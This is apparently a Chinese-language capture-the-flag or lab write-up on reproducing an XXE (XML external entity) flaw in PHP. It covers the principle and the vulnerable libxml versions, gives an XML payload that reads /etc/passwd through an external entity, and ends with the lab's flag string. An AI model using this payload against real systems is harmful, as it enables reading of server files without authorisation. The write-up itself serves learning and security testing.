目录

1、原理

2、XXE漏洞产生的原因

3、开始复现

paylaod

复现

4、flag

1、原理

XML数据在传输过程中，攻击者强制XML解析器去访问攻击者指定的资源内容（本地/远程），外部实体声明关键字'SYSTEM'会令XML解析器读取数据，并允许它在XML文档中被替换，构造恶意的值，去执行！

XML解析方式：DOM，SAX，JDOM，DOM4J，StAX……都可能会出现外部实体注入漏洞

2、XXE漏洞产生的原因

低版本php

libxml<2.9.1

设置了libxml_disable_entity_loader为FALSE

3、开始复现

libxml2.9.0以后，默认不解析外部实体，导致XXE漏洞稀少！

dom.php、SimpleXMLElement.php、simplexml_load_string.php都可以触发XXE漏洞

paylaod

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
    <!ELEMENT name ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<root>
    <name>&xxe;</name>
</root>

复现

---

这里我用的是 SimpleXMLElement.php 

这里使用payload查看了/etc/passwd文件！证实了xxe漏洞可以进行文件读取！

---

4、flag

---

是的，在主页就可以找到！

flag{ad2eb59a-d433-4168-99ce-a27245df049b}